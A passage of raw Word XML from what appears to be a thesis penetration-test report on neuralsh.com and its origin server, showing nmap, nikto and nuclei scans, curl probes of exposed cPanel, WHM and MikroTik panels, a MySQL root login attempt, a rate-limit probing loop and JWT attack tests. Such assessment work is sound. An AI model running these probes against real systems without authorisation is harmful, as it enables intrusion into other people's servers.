      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.4.1 Nmap Port and Service Scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sudo nmap -sV -sC -p 22,25,53,80,110,111,143,443,465,587,993,995,2000,2083,2087,2096,3306,5060,8899,9001 103.16.xx.xxx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="3908898"/>
            <wp:docPr id="25" name="Picture 25"/>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4.9: Nmap full port scan of 103.16.62.217 — twenty-three open ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Open ports discovered:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PORT     STATE SERVICE     VERSION</w:t>
        <w:br/>
        <w:t>22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu</w:t>
        <w:br/>
        <w:t>25/tcp   open  smtp        Exim smtpd 4.99.2</w:t>
        <w:br/>
        <w:t>53/tcp   open  domain      PowerDNS</w:t>
        <w:br/>
        <w:t>80/tcp   open  http        Apache httpd</w:t>
        <w:br/>
        <w:t>110/tcp  open  pop3        Dovecot pop3d</w:t>
        <w:br/>
        <w:t>143/tcp  open  imap        Dovecot imapd</w:t>
        <w:br/>
        <w:t>443/tcp  open  https       Apache httpd</w:t>
        <w:br/>
        <w:t>465/tcp  open  smtps       Exim (SSL)</w:t>
        <w:br/>
        <w:t>587/tcp  open  smtp        Exim (STARTTLS)</w:t>
        <w:br/>
        <w:t>993/tcp  open  imaps       Dovecot</w:t>
        <w:br/>
        <w:t>995/tcp  open  pop3s       Dovecot</w:t>
        <w:br/>
        <w:t>2083/tcp open  https       cPanel (SSL login)</w:t>
        <w:br/>
        <w:t>2087/tcp open  https       WHM root panel (SSL)</w:t>
        <w:br/>
        <w:t>2096/tcp open  https       cPanel Webmail (SSL)</w:t>
        <w:br/>
        <w:t>3306/tcp open  mysql       MySQL 8.0.43</w:t>
        <w:br/>
        <w:t>9001/tcp open  http        MikroTik RouterOS webfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Twenty distinct TCP services were found exposed on a single public IP address. The presence of ports 2083, 2087, 3306, and 9001 was immediately alarming — these are administrative and database services that should never be accessible from the public internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.4.2 Service Verification with curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Following the Nmap scan, each high-risk service was probed directly to confirm it was accessible and responsive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># WHM root administration panel</w:t>
        <w:br/>
        <w:t>curl -sk https://103.16.xx.xxx:2087/ | grep "&lt;title&gt;"</w:t>
        <w:br/>
        <w:t># &lt;title&gt;WHM Login&lt;/title&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># cPanel user panel</w:t>
        <w:br/>
        <w:t>curl -sk https://103.16.xx.xxx:2083/ | grep "&lt;title&gt;"</w:t>
        <w:br/>
        <w:t># &lt;title&gt;cPanel Login&lt;/title&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># MikroTik admin interface</w:t>
        <w:br/>
        <w:t>curl -v http://103.16.xx.xxx:9001/ 2&gt;&amp;1 | grep -E "HTTP|title"</w:t>
        <w:br/>
        <w:t># HTTP/1.1 200 OK</w:t>
        <w:br/>
        <w:t># &lt;title&gt;RouterOS router configuration page&lt;/title&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># Directory listing on origin</w:t>
        <w:br/>
        <w:t>curl -H "Host: neuralsh.com" http://103.16.xx.xxx/</w:t>
        <w:br/>
        <w:t># &lt;title&gt;Index of /&lt;/title&gt;   (Apache directory listing enabled)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="597736"/>
            <wp:docPr id="26" name="Picture 26"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig410_cpanel_whm.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="597736"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.10: cPanel and WHM login pages accessible from the public internet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="1315624"/>
            <wp:docPr id="27" name="Picture 27"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig411_mikrotik.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="1315624"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.11: MikroTik RouterOS WebFig login page — publicly accessible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.4.3 Nikto Web Scanner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nikto -h https://neuralsh.com -output /home/rith/thesis/nikto_neuralsh.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="1747470"/>
            <wp:docPr id="28" name="Picture 28"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig412_nikto.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="1747470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.12: Nikto web scanner results against neuralsh.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Key findings from Nikto included missing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>X-Frame-Options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> headers at the initial scan date, server version disclosure, and identification of robots.txt. The WAF blocked most of Nikto's signature-based checks against the main Cloudflare-fronted domain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.4.4 Nuclei Vulnerability Scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nuclei was used to run template-based checks covering common web vulnerabilities, exposed admin panels, and misconfiguration patterns. It was run against both the Cloudflare-fronted domain and the origin IP directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nuclei -u https://neuralsh.com -u http://103.16.xx.xxx -severity critical,high,medium -o /home/rith/thesis/nuclei_results.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="1240276"/>
            <wp:docPr id="29" name="Picture 29"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig413_nuclei.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="1240276"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.13: Nuclei vulnerability scan — zero matches returned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The Nuclei scan ran 6,221 templates against both the Cloudflare-fronted domain and the origin IP. Both scans returned zero template matches. The Cloudflare WAF absorbed and filtered the majority of probe requests against the main domain, while the origin IP scan completed without triggering any template signatures. This outcome is consistent with the nature of the vulnerabilities discovered: exposed admin panels, database ports, and authentication logic flaws are not detectable by template-based scanners — they require manual enumeration and targeted testing. The zero-match result reinforces that automated tooling alone would have missed all 20 findings in this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.4.5 MySQL Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Confirm MySQL accepts connections from public internet</w:t>
        <w:br/>
        <w:t>mysql -h 103.16.xx.xxx -P 3306 -u root 2&gt;&amp;1</w:t>
        <w:br/>
        <w:t># ERROR 1045 (28000): Access denied for user 'root'@'[your-ip]' (using password: NO)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The error message itself is significant — it confirms that the MySQL server performed a full authentication handshake with the external IP. The server is not just passively listening; it actively engages with connection attempts. Cloudways uses auto-generated strong passwords, which prevented brute-force success, but the exposure itself represents a critical vulnerability regardless of credential strength.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.5 Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Following scanning and enumeration, each identified service and endpoint was systematically tested. This section documents the assessment of each major vulnerability category discovered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.5.1 Authentication Rate Limiting Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The token endpoint discovered during JavaScript bundle analysis was tested for rate limiting behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Baseline test — no bypass headers</w:t>
        <w:br/>
        <w:t>for i in $(seq 1 25); do</w:t>
        <w:br/>
        <w:t xml:space="preserve">    code=$(curl -s -o /dev/null -w "%{http_code}" https://neuralsh.com/web/v1/init/token)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    echo "Request $i: HTTP $code"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    sleep 0.1</w:t>
        <w:br/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>During the initial assessment period, rate limiting was observed to engage after approximately 18–19 consecutive requests from a single IP, returning HTTP 429. A follow-up verification test conducted on 11 June 2026 found that 30 consecutive requests all returned HTTP 200 with no rate-limit response — indicating that the rate limiting control was either removed or is no longer functioning. Regardless of this change, the X-Forwarded-For bypass technique was validated during the original assessment window and is documented in the exploitation phase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.5.2 JWT Token Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The unauthenticated token endpoint was called directly, and the response was decoded using CyberChef.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s https://neuralsh.com/web/v1/init/token | python3 -m json.tool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Response:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Decoded JWT:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Header:  {"alg":"HS256","typ":"JWT"}</w:t>
        <w:br/>
        <w:t>Payload: {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "type": "guest",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "tid": "550e8400-e29b-41d4-a716-446655440000",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "iat": 1749220800,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "exp": 1749222600   (30-minute validity window)</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Any unauthenticated caller could obtain a valid signed JWT token with no credentials, API key, or device fingerprint required. Two JWT attacks were tested and blocked — algorithm substitution (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>alg:none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) was rejected by the server, and secret key brute force against the rockyou.txt wordlist (14,344,391 candidates) exhausted without a match. The token farming itself, however, was the confirmed impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.5.3 Security Header Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -sI https://neuralsh.com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Header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Strict-Transport-Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>max-age=15552000; includeSubDomains; preload</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X-Frame-Options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
